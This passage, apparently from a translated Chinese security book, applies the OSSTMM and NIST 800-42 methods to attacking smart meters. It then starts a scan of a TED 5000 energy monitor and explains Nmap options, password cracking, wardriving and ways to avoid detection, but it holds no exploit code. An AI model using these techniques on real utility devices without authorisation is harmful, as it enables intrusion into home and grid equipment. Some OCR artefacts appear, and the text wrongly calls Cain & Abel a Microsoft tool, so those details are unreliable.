的信息,同时也会提供在因特网技术安全测试一章中用到的有用信息。 12.1.3 因特网技术安全测试 可以用来测试智能电表安全的大部分模块都包含在 OSSTMM 的因特网技术 安全测试一章中。我们将会讨论怎样利用下面14个模块中的部分模块来分析智 能电表的安全。就像 OSSTMM 的部分章节不适用于测试智能电表的安全,因特 网技术安全测试一章中包括的一些模块也不适用。OSSTMM 的这一章包括如下 14个模块: (1)网络调查 (2)端口扫描 (3)服务识别 (4)系统识别 (5)漏洞研究和验证 (6)因特网应用测试 (7)路由器测试 (8)信任系统测试 (9)防火墙测试 (10)入侵检测系统测试 (11)抑制病毒传播措施测试 (12)密码破解 (13)拒绝服务测试 (14)安全策略审查 不要让本章的标题使你对本章内容应用于攻击智能电表的方式产生误解。尽 管这个标题使得这一章看上去也许只适用于因特网,但这一章包含的模块也适用 于内部网络。为了更好地了解OSSTMM 的因特网技术安全测试这一章的哪些模 块可以用来攻击智能电表及应该怎样利用它们,让我们来更深入地查看一下这些 可用的模块。 1)网络调查 因特网技术安全测试一章的网络调查模块主要用来识别网络可达的目标系 统。在智能电表的例子里,攻击者可以通过无线网络或家庭网络访问电表。不论 哪种情况,网络调查都包括获得目标的信息。这种信息收集可通过两种方式实现: 被动,即监听整个网络内的流量;或者是主动,即探测 IP 地址获得回应。 如果是被动识别目标,可以使用图12.1所示的 Wireshark 工 具 。Wireshark 可以捕获任何网络内的实时流量,并且可以深入地检查成百种网络协议。如果想 通 过Wireshark 被动地识别目标,只要创建一个 IP 地址列表让 Wireshark 去监听 即可。Wireshark 可以从 www.wireshark.org 免费获得。 执行被称为“Ping 扫描”的操作可以主动地识别目标。Ping 扫描一般是利用 网际控制报文协议(Internet Control Message Protocol,ICMP)通过分析目标的回 应来判断特定 IP 地址段内的目标是否存活。Nmap 安全工具经常被用来进行 ping 扫描,要用到“-sP” 选项。Nmap 可以在 www.nmap.org 免费获得,同时还有 大量的使用文档。 有时候,攻击者的系统和目标之间的 ICMP 流量会被阻断。在这种情况下,利 用传输控制协议(Transmission Control Protocol,TCP)的一系列 ping 技术常被采 用。TCP ping是有限的端口扫描,通过查看目标主机是否在运行常用的服务来判 断它们是否存活。Nmap 也可以用来执行 TCP ping。 2)端口扫描 OSSTMM 的因特网技术安全测试一章的下一个模块讨论的是端口扫描。端 口扫描是在目标的65536个 TCP 和用户数据包协议(User Datagram Protocol, UDP) 端口上进行探测寻求回应。回应表明服务正在相应端口上运行,可能含有最 终可以访问目标的漏洞。以前提到过,Nmap 工具实际上是端口扫描工具。TCP 扫描可以利用TCP 连 接扫描实现,完成整个 TCP 握手,或者通过TCPSYN 扫描,只用到 TCP 握手中的 SYN 和 SYN ACK 部分。 OSSTMM 建议测试小组可以自行决定扫描65536个端口中的哪些。如果可能的话就测试每个端口,尤其是测试智能设备时。否则,可能会漏掉那些运行在目标上的有漏洞的服务。 提示 Nmap 是个很有用的工具,可以为安全测试人员和攻击者提供大量的信息。然而 如果配置不当,Nmap 端口扫描会对防火墙或目标系统这样的网络设备产生不利 的影响。这些不利影响可能包括暂时的拒绝服务状况,当你的测试完成后,就恢复 正常;或者是更长久的拒绝服务状况,要求受影响的系统重启服务或重启整个系 统。如果想更好地了解如何合理地使用Nmap 工具,本书的作者建议参考 Angela Orebaugh 和 Becky Pinkard 的《Nmap in the Enterprise:Your Guide to Network Scanning》(ISBN:978-1-59749-241-6,Syngress) 。 可以从 www.syngress.com/in-formation-security-and-system-administrator/Nmap-in-the-Enterprise 获得。 3)服务识别和系统识别 服务识别和系统识别是 OSSTMM 的因特网技术安全测试一章列出的第三个 和第四个模块。这两部分的目标是列举出上一个模块里发现的TCP 或 UDP 端口 上运行的服务,同时识别出目标的底层操作系统。 这两项任务都可以用Nmap 端口扫描工具实现。在你的 Nmap 扫描里使用 -sV 选项,Nmap 就会尝试判断运行在回应端口上的服务的版本。图12.2展示了 Nmap 的版本探测功能。除了识别出 webserver.domain.com 运行在 TCP443 端口 ,Nmap 也告诉我们 webserver.domain.com 正 在 使 用ApacheWeb 服务器,版本是2.2.8,以及 PHP 和 OpenSSL 和它们的版本信息。这些信息现在可以用来判 断运行的这些版本的服务是否存在已知漏洞。 在图12 . 2所示目标 webserver.domain.com 的例子中,操作系统的信息也得 到了,因为它包含在Apache Web 服务的版本信息里。通过在你的 Nmap 扫描里 增加-O 选项,你可以获得同样的有关目标操作系统的信息。就像攻击者会使用正 在运行服务的版本信息确定该服务的漏洞一样,他们会使用同样的方法确定所识 别出的操作系统的已知漏洞。 4)漏洞研究和验证 一旦攻击者确定了目标上正在运行服务的版本以及操作系统的版本,他或她 将会执行 OSSTMM 的第五个模块:漏洞研究和验证。笼统来说,这个模块通过结 合自动和手动的测试方法来识别和验证漏洞。 漏洞扫描目的为识别目标系统的已知缺陷, 一般要执行前面提到的任务,如 ping 扫描、端口扫描和服务/系统识别。不过,我们已经执行过这些任务了,因此我们可以把已知的信息告诉漏洞扫描工具,从而更有效地攻击我们的目标。 一个常用的漏洞扫描工具是Tenable 网络安全的Nessus。Nessus 家用或个人用是免费的,但商用需要每年交$1200 的许可费用。[6]你 可以从 www.nessus.org获得 Nessus。尽 管 Nessus 很擅长自动检测出类似 Apache 的版本已经过时这样的漏洞,但 还是应该用手动测试辅助自动测试,以便发现可能被忽略的漏洞。比如由于系统管理员的疏忽,运行在 webserver.domain.com上 的 Apache Web 服务器的 SSL 密 钥被包含在了HTML 根文档中。除非 Nessus 装有可以识别此类漏洞的特殊插件,否则不会发现 SSL 密钥的存在。 OSSTMM 认为应该使用至少两个自动漏洞扫描器来执行自动漏洞测试。每个漏洞扫描工具覆盖的漏洞范围不同。除了对同一个目标应用多种自动漏洞扫描外,还应该手动进行漏洞验证。漏洞不同, 执行手动漏洞验证的技术也大不相同,但此类验证的例子不是通过Telnet 连接到 某一具体的服务来观察服务的版本就是通过FTP 客户端连接到匿名的 FTP 服务 器来实现。 在攻击智能电表的过程中,漏洞研究和验证是关键的一步,因为它可以提供入 侵智能电表的潜在入口点,这些入口点在后续的模块中将会被使用。 注意 像本章中提到的大部分工具一样,当配置不当时,Nessus 也会对目标设备造成破 坏。有大量出版的书籍详细地介绍了Nessus 的安装、应用和配置,本书的作者强 烈建议在把 Nessus 应用到生产环境前,阅读这些书中的一本。强烈推荐的书之一 就是 Syngress 系列的 Nessus Network Auditing,第二版(ISBN:978-1-59749-208- 9),作者是 Russ Rogers。可以从 www.syngress.com/special-interests/Nessus-Network-Auditing-Second-Edition 购买。 5)因特网应用测试 上一章“漏洞研究和验证”,一般是对运行在目标或智能电表上的服务中的漏 洞进行识别和验证。然而,漏洞扫描器通常不具有针对Web 应用执行漏洞识别和 验证的能力。随着越来越多的系统制造商把安全集成到他们的开发生命周期中, 攻击者可以利用的运行服务的数量减少了。这让攻击者把注意力转向了运行在目 标设备上的 Web 应用。拿智能电表来说,它们可能包含这样的Web 应用,允许消 费者查看或配置使用信息,或者允许技术人员对设备进行配置。本模块的目标和上一个模块是一样的,只是范围不同。 对 Web 应用进行漏洞识别和验证比对运行服务进行相同的测试更具有挑 战性。这是每个Web 应用的定制程度不同造成的。很少见到一个 Web 应用和 另一个完全相同,即便是发现两个完全相同的Web 应用在运行,它们的后端基 础设施也可能不同。因为这个原因,通过使用签名插件识别漏洞的传统方法是 不奏效的。 尽管基于签名的漏洞扫描本身是不奏效的,但它仍然是在 Web 应用中识 别和验证漏洞的组成部分。不过,手动测试在对 Web 应用进行漏洞识别和验 证的过程中明显发挥着更大的作用。要执行手动测试,需要使用大量工具和 技术。开源Web 应用安全计划(OWASP) 为 Web 应用制定了测试指导。可以 从 OWASP_www.owasp.org/index.php/Category:OWASP_Testing_Project 获得。 提 示 执行手动测试的能力来自于编程和安全测试的经验。幸运的是,对于想学习并最 终要执行 Web 应用安全测试的人来说,有很多可用的资源。本书的作者强烈推荐 Steven Palmer 的 Web Application Vulnerabilities:《Detect,Exploit,Prevent》 (ISBN:978-59749-209-6), 可以从 Syngress 系列在 www.syngress.com/hacking- and-penetration-testing/Web-Application-Vulnerabilities 获得。 6)密码破解 OSSTMM 的因特网技术安全测试一章的第十二个模块和密码破解有关。从 本质上说,密码破解指的是试图找出能访问一个运行服务或 Web 应用的有效凭 证。测试可以通过遍历预先设定的密码清单,即字典攻击,或者是尝试每种依照某 标准的可能组合(字母、数字、特殊符号等等),即暴力破解来实现。当尝试密码破解时,要注意许多服务和Web 应用有账户锁定的功能,在一段 特定的时间内,如果记录到太多次的错误密码尝试,该账户就会被暂时或永久地 禁用。执行密码破解的常用工具是Cain&.Abel, 如图12.4所示,支持字典攻击和暴 力破解两种方式。Cain&.Abel 是微软的一个工具,可以从 www.oxid.it 免费 获得。Openwall 项目维护了大量详尽的词语清单,可以用于字典攻击。简化版本可以从www.Openwall.com/password/wordlists 免费获得,完整版本可以通过底价 是$27.95的支付模式选项获得。 攻击智能电表时若弹出身份认证窗口,密码破解模块就起到了大作用。如果 攻击者可以成功地获得进入智能电表的凭证,他或她也许当下就获得了对设备的 全部控制权,不然的话也可能进入一个额外的界面可以对其执行前面提到的安全 测试。 7)拒绝服务测试 OSSTMM 的因特网技术安全测试一章的拒绝服务测试模块主要是发现存在 于目标基础设施的影响目标可访问性的缺陷。拿智能电表来说,许多缺陷存在于 设备本身或者是底层的基础设施。对智能电表执行拒绝服务漏洞测试要用到前面 提到的 Wireshark 和 Nmap 工具。例如,可以用 Wireshark 来判断出入智能电表 的正常流量模式。然后可以用Nmap 工具逐渐增加通向智能电表的流量,试图使 设备本身或底层的基础设施瘫痪。 与试图破坏智能电表的机密性和完整性的攻击相比,如果攻击者的目标只是 简单地使智能电表拒绝服务,那么实施这样的攻击对他们来说是很容易的。 8)漏洞利用测试 在 OSSTMM 开头列出的模块清单里提到了一个叫“漏洞利用研究和验证”的 模块,位于因特网技术安全测试一章。不过,在那一章的详细描述中,却没有这一 模块。漏洞利用研究和验证已经被整合到了漏洞研究和验证以及因特网应用测试 模块中。 本书的作者认为考虑到这一模块在攻击智能表时的重要性,把漏洞利用测试 单独作为一部分是明智的。因特网技术安全测试一章中前面的模块都为执行攻击 程序测试打下了基础。漏洞利用测试试图用已经识别出的漏洞和缺陷破坏智能电 表。漏洞利用测试的例子包括用代码使正在运行服务的缓冲区溢出或者是利用 Web 应用中的输入验证漏洞,通过SQL 注入获得控制 shell。 在第8章“公用事业公司安全”提到过,Metasploit 是一款给安全测试人员和 攻击者提供了大量的漏洞利用程序和攻击载荷的免费攻击工具。Metasploit, 如 图12.5所示,可以从 Rapid7 在 www.metasploit.com 获得。 安全测试人员的最终目的一般是让目标暴漏出缺陷,然而对攻击者来说,让目 标暴露出缺陷也许只是他们为达成最终目的而制定的方案中的一步。 警告 在本章所提到的所有工具中,Metasploit 对目标系统有最大的潜在威胁。本书的 作者认为在把 Metasploit 应用到生产环境之前,阅读 David Maynor的《Metasploit Toolkit for Penetration Testing》,《Exploit Development》,and《Vulnerability Research》(ISBN:978-1-59749-074-0) 是 必 要 的 。 可 以 从 Syngress 系 列 在 www.syngress.com/hacking and penetration-testing/Metasploit-Toolkit-for-Penetra- tion-Exploit-Development-and Vulnerability-Research 获得。 12.1.4 通信安全测试 ISECOM 的 OSSTMM 的第4章讲的是通信基础设施的安全测试。这一章把 电话网络设备作为目标,分为以下8个模块[]: (1)态势审查 (2)PBX 审查 (3)语音信箱测试 (4)传真测试 (5)调制解调器调查 (6)远程访问控制测试 (7)网络电话测试 (8)X.25 分组交换网络测试 这些模块尽管在评估公用事业公司安全时很重要,但不适用于攻击智能电表。 有些部分可能看上去和上一章“因特网技术安全测试”及下一章“无线安全测试”中的一些部分有所重叠。 12.1.5 无线安全测试 由于无线技术是智能电表和公用事业公司之间通信的主要方法,因此这一章 包含的模块对攻击智能电表至关重要。就像上一章“因特网技术安全测试”一样, 下面的这些模块并不都适用于攻击智能电表。ISECOM 的 OSSTMM 的无线安全 测试一章包含如下12个模块: (1)态势评审 (2)电磁辐射测试 (3)802.11无线网络测试 (4)蓝牙网络测试 (5)无线输入设备测试 (6)无线手持设备测试 (7)无线通信测试 (8)无线监控设备测试 (9)无线传输设备测试 (10)射频识别(RFID) 测试 (11)红外线测试 (12)隐私评审 为了更好地了解 OSSTMM 的无线安全测试这一章的哪些模块可以用来攻击 智能电表及应该怎样利用它们,让我们更深入地查看这些可用的模块。 1)802.11无线网络测试 OSSTMM 的无线安全测试一章的第三个模块讲的是测试任何基于802.11的 网络的安全。总的来说,这个模块的目标是试图破坏在无线网络上传输的数据的 机密性、完整性或可用性。Kismet 是一款常用的测试802.11 网络的无线嗅探工具。和 Wireshark 嗅探 有线网络的方式很像,Kismet 可以实现无线网络识别,包括接入点类型、网络名 (SSID)、相连的客户端以及实现的安全方案(如果有的话)。它还可以记录下数据 包,用于以后的分析或者是应用于加密破解工具,如 AirCrack-ng 。Kismet 如 图12.6所示,可以从 www.kismetwireless.net 上免费获得。 当在智能电表的环境中查看802.11无线网络测试模块时,你可能会发现目标智 能电表并没有使用802.11无线网络。它可能使用的是802.15.4无线网络,如 Zig- Bee。在802.11网络中讨论的概念也可以应用于802.15.4无线网络。不过,用在 802.15.4网络中的硬件和软件可能会不同。要想了解关于测试802.15.4无线安全 的更多信息,请访问 Travis Goodspeed 的博客,位于 http://travisgoodspeed.blogspot.com 。Travis 在 ZigBee方面做了大量的工作,并且把他的发现出版或是在会 议上发表,以便更好地保护那些使用802.15.4技术的设备,如智能电表。 2)蓝牙和 RFID 安全测试 OSSTMM 的无线安全测试一章有两个模块分别讨论蓝牙和 RFID 无线技术 的安全测试。尽管这两种无线技术在现行的智能电表中应用还不广泛,但本书 的作者建议可以做一些粗略的测试,查看目标智能电表是否在使用这两种 技术。 Kismet 最近增加了一项检测蓝牙设备的功能。因此,可以用 Kimset 做检测 测试,判断目标智能电表是否使用了蓝牙技术。检测目标智能电表是否使用了 RFID 技术有点困难。不过,你可以从 http://rfid.marcboon.com 上了解如何创 建你自己的 RFID 嗅探工具。 注意 如果你想学习更多关于 RFID 安全的知识,本书的作者建议阅读 Frank Thomton 和 Paul Sanghera的《How To Cheat At Deploying &.Securing RFID》(ISBN:978- -59749-230-0,Syngress)。本书包括了RFID 技术的攻防策略。可以通过以下途径 www.syngress.com/information-security-and-system-administrators/How-to- Cheat-at-Deploying-and-Securing-RFID 购买。 12.1.6 物理安全测试 ISECOM 的《开源安全测试方法手册》的最后一章讲的是测试目标的物理安 全。由于公用事业公司计划将为顾客的全部住处都安装上智能电表,智能电表的 物理安全在确保智能电网安全上就显得至关重要。为了对目标的物理安全态势进 行评估,OSSTMM 在物理安全测试一章中包含了如下7个模块 : (1)态势审查 (2)访问控制测试 (3)外围边界审查 (4)监控审查 (5)报警响应审查 (6)位置审查 (7)环境审查 OSSTMM 的因特网技术安全测试和无线安全测试两章中的某些模块不适用 于攻击智能电表,物理安全测试一章中的7个模块也是一样。在 OSSTMM 的这 一章包含的模块中,假定对目标的物理访问通常是不被允许的。然而,前面提到 过,对于智能电表,情况并非如此。不过,物理安全测试模块中的某些部分还是适 用于攻击智能电表的。 物理安全测试一章的访问控制模块讨论的是如何测试目标的访问控制措施。 对于攻击智能电表来说,这包括识别出任何能检测到智能电表遭到破坏并提供一 些警报或触发的机制。对设备的物理检查和网络数据挖掘应该是评估目标智能电 表访问控制措施的两种最有效的方式。 在对智能电表实施物理安全攻击测试时,也许会发现一些监控措施已被部署 令攻击失效。这个模块简单地识别和监视负责观测目标的解决方案的运行情况,并 决定该如何击败它们。在大楼里的智能电表上装的监控摄像头就是个例子。攻击智 能电表的物理安全时可以使用的对抗措施包括使摄像头不可用或隐藏你的身份。 位置评估模块讲的是基于目标位置识别目标的缺陷。以智能电表来说,这指 的是判断你是否可以物理访问电表。由于大多数电表都是安装在楼房的两侧,因 此几乎所有的攻击者都遇不到可以阻止他们访问智能电表的控制措施。 12.2 NIST 特刊800-42:网络安全测试指导 美国国家标准技术研究所(National Institute of Standards and Technology, NIST) 在2003年10月发布了特刊800-42:网络安全测试指导。自从那时起,安全 测试人员和攻击者就都用该方法评估目标设备的安全。NIST800-42 包括三大章: 安全测试和系统开发生命周期、安全测试技巧、安全测试的配置策略。基于攻击智 能电表的目的,我们将会详细查阅“安全测试技巧”一章并讨论怎样利用这章中的 知识攻击智能电表。 12.2.1 安全测试技巧 NIST 特刊800-42的安全测试技巧一章,或者说是第3章,包含如下章节: (1)测试的角色和职责 (2)网络扫描 (3)漏洞扫描 (4)密码破解 (5)日志审查 (6)文件完整性检查器 (7)病毒检测 (8)战争拨号 (9)无线LAN 测试(“沿街扫描”) (10)入侵测试 (11)检测的后续活动 (12)普遍信息安全原则 (13)网络测试技巧的总结性比较 NIST 800-42的“安全测试技巧”一章的13节并不都适用于攻击智能电表。 我们将详细地查阅那些适用的章节,并叙述它们是怎样与攻击智能电表联系的。 对先前讨论的ISECOM 的《开源安全测试方法手册》的引用和比较会出现在下面 的分析中,因此本书的作者强烈建议在你继续之前先阅读本章的那一节。 1)网络扫描 NIST800-42 的第3.2节讨论的是如何利用ping 扫射和端口扫描识别目标网 络上的活动主机以及运行在这些主机上的网络服务。另外,这一节也提到了操作 系统的识别,可以通过运行 Nmap 的时候选择-O 来实现。 NIST 800-42的网络扫描一节也提到了如何利用版本信息识别运行在某开放 端口上的应用的类型。阅读版本信息可以帮助攻击者判断他们是在攻击 Apache Web 服务器还是微 软因特网信息服务(Internet Information Services,IS)Web 服务器。 正在扫描的主机或网络带来的潜在不利影响,以及漏洞扫描人员倾向于关注广为 人知的漏洞,也许会漏掉那些模糊的漏洞的事实的讨论。攻击者可以用这些讨论 到的信息改进他或她的漏洞识别和验证过程。首先,为了减少攻击者在漏洞扫描中出现的误报数量,他们可以使用不同的扫 描器。OSSTMM 在漏洞研究和验证一章中已经讨论过。其次,攻击者会试图通过 使用Wireshark 工具把他或她的漏洞扫描对目标和相关网络的影响降到最小。这 个在前面也讨论过,不过是在OSSTMM 的拒绝服务测试一章中,攻击者可以使用 Wireshark 工具获悉正常的流量模式,然后限制他或她的漏洞扫描,以尽可能地接 近正常的流量。这个也许看上去像是徒劳无获的;然而,如果已经知道攻击者的目 标包含有设备被攻击或不稳定时关闭设备的对抗措施,攻击者也许就只能获得一 次执行漏洞扫描的机会。最后,攻击者可以对目标上已识别出的网络服务和操作 系统进行手动研究,从而识别可能被自动漏洞扫描忽略的漏洞。这有助于减少由 于自动测试导致的误报。 NIST 800-42强调漏洞检测和及时打补丁的重要性,把它们作为控制风险的 先行性技术。8不过,攻击者也可以利用这些,识别那些会导致他们的目标,如智能 电表泄露信息的漏洞。 3)密码破解 NIST 800-42的第3.4节阐述了在破解密码时用到的技术。这些技术和 OSSTMM 在密码破解一章中所讨论到的技术相似;不过,现在多了几个补充条目。 这些条目包括通过网络嗅探被动获得密码,和使用混合攻击方式破解密码。 NIST 800-42 在密码破解这部分涉及到的第一个补充条目是通过使用网络嗅探 工具捕获在网络段内传送的明文密码。从攻击者的角度看,他们可以使用Wireshark 网络嗅探工具捕获在网络内传送的未加密的密码。虽然针对交换网络的网络嗅探只 能捕获到很少量的包,但对无线网络的嗅探却可以捕获到在无线网络内传送的每个 包。像前面在 OSSTMM的802.11无线安全测试一章中提到的那样,Kismet 可以捕 获无线网络数据包,然后这些包可以用工具查看,如 Wireshark。NIST 800-42也介绍了被称作“混合攻击”的密码破解概念。 这种密码破解 基于一份单词清单,然后向单词清单里的单词增加字符。例如,如果一份单词清单 里包含单词“yellow”, 使用混合攻击方式的密码破解工具会测试如下密码,如 “yellow1” 、“!yellow” 和“! yellow@@” 。 前面提到过的 CainandAbel 密码破解 工具,如图12.4所示,可以执行混合攻击。 NIST 800-42 包含的这些补充条目对攻击者来说,都会产生意义重大的结果。 一旦攻击者获得了能访问运行在智能电表上的网络服务或操作系统的有效凭证, 他或她实现其目标的几率就显著提高了,不管他们的目标是什么。 4)无线LAN 测试(“沿街扫描”) NIST 800-42的第3章的第9节讲的是无线 LAN 测试,重点是“沿街扫 描”。8沿街扫描指的是在街坊、楼房和办公室周围驾驶,寻找开放的或未加密的无线网络的行为。尽管这种方法也许和攻击智能电表没有直接关系,但可以用它来 识别智能电表与之通信的基站或接入点。 一旦基站或接入点被识别出来了,前面 提到的 NIST 800-42和 OSSTMM 的所有安全测试技术几乎都可以用来测试接入 点。如果攻击者可以入侵与接入点通信的设备,那攻击者也许就获得了访问智能 电表的另一种方式。 虽然前面已经讨论了无线网络工具Kismet,NIST 800-42也提到了 Network Stumbler 的 使 用 。Network Stumbler是基于微软窗口的工具,和 Kismet 很像,可以识别接入点。它没有包含 Kismet 的全部功能,但很适合用于沿街扫描这样的活动。 注意 Frank Thornton 、Michael J Schearer 和 Brad Haines 合作出版了 Kismet Hacking (ISBN:978-1-59749-117-4)。 该书的主题是使用Kismet 工具实施无线安全测试 它还提到了构建Kismet 侦察机,以及用GPS 定位映射网络。Kismet Hacking 可以从 Syngress 系列在 www.syngress.com/hacking-and-penetration-testing/Kis- met-Hacking 获得。 5)入侵测试 我们在 NIST 800-42的第3章中将要讨论的最后一节是3. 10节,入侵测试。 概括来讲,这一节讨论的是和入侵测试相关的风险,以及执行入侵测试的常用方 法。8]第3.10节也通过NIST 的四阶段入侵测试方法体系讨论了一个经常被忽略 的入侵测试的概念。 从攻击者的角度看,NIST 800-42 的入侵测试一节可以提醒他们在试图攻击 真实的智能电表之前测试他们的攻击代码的重要性。就像我们之前在 NIST 800- 42的漏洞扫描一节中提到的,入侵测试也会对目标造成很大的影响,会让智能电 表变得没反应。为此,攻击者在把他或她的攻击代码应用到智能电表之前必须在 相似的系统或设备上全面地对代码进行测试。否则,攻击者也许会浪费他或她的 唯一的破坏设备的机会。 NIST 800-42为读者提供了两种入侵测试的方法。第一种方法被称为Blue Teaming, 是先前对目标环境有一定了解,并获得了负责管理目标环境的机构的许 可再执行入侵测试。第二种方法,被称为 Red Teaming,是先前对目标环境不了解,并且目标机构对整个测试的了解有限(通常只有上层管理者有所了解)的情况 下执行入侵测试。Blue Teaming和 OSSTMM 的 Tandem 方法等同,Red Teaming 和OSSTMM 的 Blind 方法等同。攻击者的方法绝大多数都和 OSSTMM 的 Double Blind 方法相似。 最后,NIST 800-42 的入侵测试一节描述了他们的四阶段入侵测试方法体系。 这四个阶段(计划、发现、攻击和报告)和本章陈述的一些大的方法体系相似。不 过,这个特殊的方法体系强调一旦攻击者成功入侵了一个脆弱的系统,该方法体系 就又回归到了发现阶段,此时攻击者会判断他们是否能发现一些他们之前不能访 问的额外的信息或系统。 攻击者当然想确保公用事业公司或智能电表制造商没察觉到他们的测试动 作。类似地,攻击者的安全测试计划应该把额外的发现包含进来,当他们成功入侵 智能电表时,这也许可以使他们访问那些最开始被认为无法访问的信息或系统。 12.3 总结 安全测试可以是成熟的信息安全计划中的一项主动的行动,也可以是攻击者 的入侵智能电表计划的一部分。不管哪种方式,授权的和未授权的安全测试如果 想成功,必须都得遵循已确定下来的方法体系。当攻击者为入侵智能电表制定计 划时,他们可以轻易地采用本章介绍的两种方法体系中的任一种。公用事业公司 和智能电表制造商必须遵循相似的方法体系,以便全面地了解和发现向每位公用 事业公司的顾客提供智能电表时产生的威胁。否则,公用事业公司在面对他们的 智能电表被成功入侵的结果时会严重措手不及。 攻击智能设备 13.1 选择目标智能设备 把智能电表作为目标的攻击者将被限制只能攻击那些安置在他们可以访问的 区域内的电表。智能设备就不存在这样的情况,因为攻击者可以简单地从网上订 购或者从当地的五金店买到它们。在选择可以作为目标的可用智能设备时,攻击 者有很多不同的设备可选。他们可以选择一些简单的设备,如富士通的智能电源 板(图13.1)或者是一些复杂的设备,如 Energy 股份有限公司的 Energy Detective 5000。 富士通的智能电源板可以让消费者监控连接到电源板上的设备的能源使用情 况,通过USB 无线传送器在用户的家用网络中发送数据。对无线网络技术的使用使得富士通的智能电源板成为攻击者感兴趣的目标;不过,还有一些其他设备提 供的攻击面更大。 这些设备之一就是前面提到过的 Energy 股份有限公司的 Energy Detective 5000,即 TED5000。从Energy 股份有限公司的网站上可以看到, TED 5000“是一个简单但非常精确的家用能源监控器,使你可以实时地查看电的 使用情况。” 概括来说,TED 5000 连接到你家的配电板上,然后通过电线把读出的数据发 送给网关设备。该网关设备运行着一个提供给用户监控用的信息的Web 服务器, 也可以和Google 的功率表结合。你可以从 www.theenergydetective.com 了解更 多关于 TED 5000 的信息。 基于本章的目的,TED 5000 因为其广泛的应用、可用性、易安装性以及攻击面 (无线、网络服务和 Web 服务)被选为目标智能设备。 提示 尽管 TED5000 的安装相对容易,但也需要对电力工作的基本了解和熟悉。安装 可能需要在你家的电板上装断路器,如果装的不合理,会造成严重的损害或直接瘫 痪。如果你对电力工作不熟悉,本书的作者建议你请一位职业电工为你安装 TED 5000。 13.2 攻击智能设备 现在我们已经选择 TED 5000 作为我们的目标设备,让我们首先查看一下我 们的攻击计划。在下一节中,我们会使用ISECOM 的 OSSTMM 方法体系。我们 将主要关注 OSSTMM 的过程安全测试一章,重点是下面这些可用模块: ● 网络调查 ● 端口扫描 ● 服务识别和系统识别 ● 漏洞研究和验证 ● 因特网应用测试 ● 密码破解 ● 拒绝服务测试 ● 漏洞利用测试 对于上面列出的每个模块,我们将利用开源工具来执行测试。如果你想暂停 一下检查你是否已经有了所有要用到的工具,下面是我们将要用到的工具列表: ● Wireshark-www.wireshark.org ● Nmap-www.nmap.org ● Nessus-www.nessus.org ● w3af-http://w3af.sourceforge.net ● Bruter-http://sourceforge.net/projects/worawita/ ● Metasploit-www.metasploit.com 这些工具并不是用来执行OSSTMM 模块里描述的测试的唯一工具。有许多 其他的商业或是开源工具可以用来替代上面提到的工具。 工具 在制订本章内容时,本书的作者使用了多种系统和操作系统,包括Apple 的 Snow Leopard、微软的 windows7 和 Ubuntu 10.04(Lucid Lynx)。建议的是访问上面这三个系统,不过有个更简单的方法可以快速获得上面提到的工具中的大部分 BackTrack 。BackTrack 是一个基于 Linux 的操作系统,可以从 Live DVD 、Vm- ware 映像中运行,也可以像其他的 Linux 发行版那样安装。 使用 BackTrack 最 大的好处是除了DVD 自带的可移植的入侵测试库,就是所需的工具已经提前配置 到 BackTrack 的运行环境。这意味着很少的或零配置,而配置操作对那些没有多 少 Linux 经验的人来说,往往是个障碍。BackTrack 可以从 www.backtrack- linux.org 免费获得, 13.2.1 网络调查 网络调查模块的目的是识别出供后续检测的目标。在攻击 TED5000 的例子 里,我们仅仅是想知道它的 IP 地址。就像上一章讨论的,这可以通过两种方式 完成: ● 被动一利用 Wireshark 工具捕获网络流量并手动识别 TED 5000 ● 主动一利用 Nmap 执行 ping扫射定位 TED5000 的回应 首先,让我们看一下我们将如何利用Wireshark 被动地识别 TED5000 的 IP 地址。为了让这个被动识别发挥作用,你的测试系统必须和目标设备在同一个网 络内。为了达到本章的目的,我们的测试系统通过一个集线器和TED5000 相连。 如果你不能使用 Wireshark 被动地捕获数据包,比如你和目标不在同一网络内, 你可以使用Nmap 的 ping 扫描主动地识别 TED5000。 图13.4展示了如何用 Nmap 执行 ping 扫描来识别目标系统。在使用Nmap 时通过选择-sP 选项,你可以执行 ping 扫描返回活动目标的IP 和 MAC 地址。图13.4显示一个关联到 Energy(En- ergy 股份有限公司)的MAC 地址正活动在192.168.210.5这个IP 地址上。 到现在为止,我们已经实现了网络调查模块的目标。我们已经识别出了我们 的目标,TED5000 智能设备,IP 地址是192.168.210.5,MAC 地址是00:25:2F: 21:2D:65。 这个信息会一直在剩下的模块中出现,因此把它记下来是很重要的。 13.2.2 端□扫描 ISECOM 的 OSSTMM 的过程安全测试一章的端口扫描模块的目的是识别出 运行在目标(TED5000) 上的服务。为此我们使用Nmap 对我们的目标智能设备 执行端口扫描。图13.5显示了用来识别在 TED5000 智能设备上所有开放端口 的命令行语句。 当使用 Nmap 识别运行在 TED5000 上的服务的时候,会用到下面的选项: ● -n- 这个选项告诉Nmap 不执行 DNS 分辨。加上这个只是因为在测试网 络上没有对 TED 5000 的 DNS 记录。省略这个选项会使 Nmap 对活动主 机执行 DNS 分辨 ●-sS- 这个选项告诉Nmap 执行被称为SYN 扫描的操作。SYN 扫描只对目 标进行半连接 TCP 扫描。SYN 扫描经常被用来加快端口扫描的速度,并 减轻对目标的影响 ● -P- 这个选项告诉 Nmap 识别目标上65535个端口中的任何响应端口。尽 管扫描全部的 TCP 端口要比扫描一部分端口,比如1-1024,明显花费更多 的时间,本书的作者还是强烈建议使用这个选项,因为可以得到更完整的 结果 ●-0G- 这个选项告诉 Nmap 把结果输出到一个可供查询的文件里。可供查 询的文件使得用户可以从众多输出文件中查找定位。其他常用的 Nmap 输出是 Normal(oN) 和 XML(oX) 格式。如果想同时把结果输出到这三种 主要格式里,使用-oA 标志 TED 5000智能设备在两个 TCP 端口上有响 应,80和443。这两个端口和 Web 服务有关,TCP 80 端口 一般用于 HTTP,TCP443 端口一般用于 HTTPS。 提示 如果你对目标设备上识别出来的端口不熟悉,网上有许多资源列出了和 TCP 及 UDP 端口相联系的服务。这些资源之一是互联网地址编码分配机构(Internet Assigned Numbers Authority,IANA)的 Port Numbers,位于 www.iana.org/as- signments/port-numbers。 把-sS 选项换为-sU 选项,Nmap 就会扫描目标设备的全部(65535)UDP 端口。 TED 5000在 UDP 端口上都没有响应。 或者,TCP 和 UDP 扫描可以被结合到一个命令里。这个扫描完成要花费很 长时间,所以就没有必要看着 TCP 扫描完成。 图13.5和13.6显示的结果表明 TED5000 可以识别的运行服务有限,从而 可以减少对该设备的潜在攻击途径。尽管如此,通过简单地执行前面提到的 Nmap TCP 和 UDP 端口扫描,OSSTMM 的过程安全测试一章的此模块已经 完成。 13.2.3 服务识别和系统识别 ISECOM 的 OSSTMM 的过程安全测试一章的服务识别和系统识别模块的目 的是,识别出端口扫描期间有回应的那些 TCP 和 